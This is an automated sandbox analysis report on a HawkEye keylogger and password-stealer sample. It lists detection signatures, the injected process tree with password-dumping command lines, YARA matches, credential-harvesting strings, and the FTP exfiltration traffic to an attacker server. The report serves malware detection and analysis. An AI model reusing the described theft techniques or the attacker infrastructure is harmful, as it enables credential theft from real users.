Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report FukQGQj7cl

Overview

General Information

Sample Name:FukQGQj7cl (renamed file extension from none to exe)
Analysis ID:462697
MD5:83f58ecf0778e3b0acca8497df23ef23
SHA1:a2123e816fcd387873272e022220fbc05b96d392
SHA256:437fae5aa2cad8ddb1fe3e316afdc6a1fdd2676084131fdc082ffdc8a53f066d
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains very large array initializations
Changes the view of files in windows explorer (hidden files and folders)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sample uses process hollowing technique
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w10x64
  • FukQGQj7cl.exe (PID: 4792 cmdline: 'C:\Users\user\Desktop\FukQGQj7cl.exe' MD5: 83F58ECF0778E3B0ACCA8497DF23EF23)
    • InstallUtil.exe (PID: 6284 cmdline: C:\Users\user\AppData\Local\Temp\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
      • vbc.exe (PID: 6860 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 6852 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView"], "Version": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
    00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
      00000016.00000002.364855957.0000000000400000.00000040.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
        00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
        • 0x7ba5a:$key: HawkEyeKeylogger
        • 0xfdd18:$key: HawkEyeKeylogger
        • 0x7dc58:$salt: 099u787978786
        • 0xfff16:$salt: 099u787978786
        • 0x7c073:$string1: HawkEye_Keylogger
        • 0x7cec6:$string1: HawkEye_Keylogger
        • 0x7dbb8:$string1: HawkEye_Keylogger
        • 0xfe331:$string1: HawkEye_Keylogger
        • 0xff184:$string1: HawkEye_Keylogger
        • 0xffe76:$string1: HawkEye_Keylogger
        • 0x7c45c:$string2: holdermail.txt
        • 0x7c47c:$string2: holdermail.txt
        • 0xfe71a:$string2: holdermail.txt
        • 0xfe73a:$string2: holdermail.txt
        • 0x7c39e:$string3: wallet.dat
        • 0x7c3b6:$string3: wallet.dat
        • 0x7c3cc:$string3: wallet.dat
        • 0xfe65c:$string3: wallet.dat
        • 0xfe674:$string3: wallet.dat
        • 0xfe68a:$string3: wallet.dat
        • 0x7d79a:$string4: Keylog Records
        00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
          Click to see the 31 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          16.2.InstallUtil.exe.8460000.11.raw.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
          • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
          21.2.vbc.exe.400000.0.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
            16.2.InstallUtil.exe.4089930.8.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
              1.2.FukQGQj7cl.exe.4acafa7.10.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                1.2.FukQGQj7cl.exe.478476a.4.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                  Click to see the 100 entries

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: Possible Applocker BypassShow sources
                  Source: Process startedAuthor: juju4: Data: Command: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, CommandLine: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, ParentCommandLine: 'C:\Users\user\Desktop\FukQGQj7cl.exe' , ParentImage: C:\Users\user\Desktop\FukQGQj7cl.exe, ParentProcessId: 4792, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, ProcessId: 6284

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: vbc.exe.6852.22.memstrminMalware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView"], "Version": ""}
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: FukQGQj7cl.exeVirustotal: Detection: 45%Perma Link
                  Source: FukQGQj7cl.exeReversingLabs: Detection: 35%
                  Machine Learning detection for sampleShow sources
                  Source: FukQGQj7cl.exeJoe Sandbox ML: detected
                  Source: 16.2.InstallUtil.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                  Source: 16.2.InstallUtil.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpackAvira: Label: TR/Inject.vcoldi
                  Source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpackAvira: Label: TR/Inject.vcoldi
                  Source: FukQGQj7cl.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: unknownHTTPS traffic detected: 142.250.185.196:443 -> 192.168.2.3:49715 version: TLS 1.0
                  Source: FukQGQj7cl.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                  Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.501178621.00000000084C0000.00000004.00000001.sdmp
                  Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: FukQGQj7cl.exe, 00000001.00000003.299838271.0000000006CE4000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000000.297962667.0000000000D62000.00000002.00020000.sdmp, InstallUtil.exe.1.dr
                  Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe
                  Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe
                  Source: Binary string: InstallUtil.pdb source: FukQGQj7cl.exe, 00000001.00000003.299838271.0000000006CE4000.00000004.00000001.sdmp, InstallUtil.exe, InstallUtil.exe.1.dr
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmpBinary or memory string: autorun.inf
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmpBinary or memory string: [autorun]
                  Source: InstallUtil.exe, 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                  Source: InstallUtil.exe, 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmpBinary or memory string: [autorun]
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2020410 ET TROJAN HawkEye Keylogger FTP 192.168.2.3:49745 -> 45.141.152.18:21
                  Source: global trafficTCP traffic: 192.168.2.3:49746 -> 45.141.152.18:62025
                  Source: Joe Sandbox ViewIP Address: 45.141.152.18 45.141.152.18
                  Source: Joe Sandbox ViewIP Address: 45.141.152.18 45.141.152.18
                  Source: Joe Sandbox ViewASN Name: M247GB M247GB
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: unknownFTP traffic detected: 45.141.152.18:21 -> 192.168.2.3:49745 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 10:48. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 10:48. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 10:48. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 10:48. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                  Source: unknownHTTPS traffic detected: 142.250.185.196:443 -> 192.168.2.3:49715 version: TLS 1.0
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe, 00000016.00000002.364855957.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe, 00000016.00000002.364855957.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                  Source: vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: unknownDNS traffic detected: queries for: www.google.com
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                  Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
                  Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
                  Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                  Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpString found in binary or memory: http://crls.pki.goog/gts1c3/moVDfISia2k.crl0
                  Source: InstallUtil.exe, 00000010.00000003.314395304.00000000061EB000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: InstallUtil.exe, 00000010.00000003.314578251.00000000061EB000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.comB
                  Source: InstallUtil.exe, 00000010.00000003.314280047.00000000061EB000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.comsUKAi
                  Source: InstallUtil.exe, 00000010.00000002.494142383.0000000003476000.00000004.00000001.sdmpString found in binary or memory: http://ftp.badonfashoin.com
                  Source: FukQGQj7cl.exe, 00000001.00000003.306427088.0000000009950000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
                  Source: FukQGQj7cl.exe, 00000001.00000003.230610513.000000000994A000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/12A
                  Source: FukQGQj7cl.exe, 00000001.00000003.306427088.0000000009950000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
                  Source: FukQGQj7cl.exe, 00000001.00000003.230610513.000000000994A000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g2A
                  Source: FukQGQj7cl.exe, 00000001.00000003.306427088.0000000009950000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj
                  Source: FukQGQj7cl.exe, 00000001.00000003.230610513.000000000994A000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj2A
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                  Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                  Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr10)
                  Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1c301
                  Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
                  Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
                  Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
                  Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
                  Source: FukQGQj7cl.exe, 00000001.00000002.312563898.0000000002ECF000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/WebPage
                  Source: FukQGQj7cl.exe, 00000001.00000002.312280965.0000000002EA1000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                  Source: InstallUtil.exe, 00000010.00000003.319415666.00000000061E8000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: InstallUtil.exe, 00000010.00000003.319806893.00000000061E9000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                  Source: InstallUtil.exe, 00000010.00000003.320005338.00000000061E7000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comLP
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp, InstallUtil.exe, 00000010.00000003.326807641.00000000061DE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: InstallUtil.exe, 00000010.00000003.326807641.00000000061DE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: InstallUtil.exe, 00000010.00000003.329177139.000000000620A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmln-us
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: InstallUtil.exe, 00000010.00000003.326807641.00000000061DE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersd
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                  Source: InstallUtil.exe, 00000010.00000003.313190214.00000000061EB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comcNUlA(
                  Source: InstallUtil.exe, 00000010.00000003.313322897.00000000061EB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comicXU
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: vbc.exe, vbc.exe, 00000016.00000002.364855957.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: InstallUtil.exe, 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp, InstallUtil.exe, 00000010.00000003.315759111.00000000061EB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                  Source: InstallUtil.exe, 00000010.00000003.315478837.00000000061EB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comEUuA
                  Source: InstallUtil.exe, 00000010.00000003.315250712.00000000061EB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comWUgA
                  Source: InstallUtil.exe, 00000010.00000003.315832509.00000000061EB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comcomEUuA
                  Source: InstallUtil.exe, 00000010.00000003.315611989.00000000061EB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comsUKAi
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpString found in binary or memory: https://pki.goog/repository/0
                  Source: FukQGQj7cl.exe, 00000001.00000002.312280965.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
                  Source: FukQGQj7cl.exe, 00000001.00000002.312280965.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
                  Source: vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715

                  Key, Mouse, Clipboard, Microphone and Screen Capturing:

                  barindex
                  Yara detected HawkEye KeyloggerShow sources
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.478476a.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.InstallUtil.exe.30ab2a0.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: FukQGQj7cl.exe PID: 4792, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6284, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_0040AC8A GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,
                  Source: FukQGQj7cl.exe, 00000001.00000002.309200167.000000000130A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  System Summary:

                  barindex
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 16.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 16.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
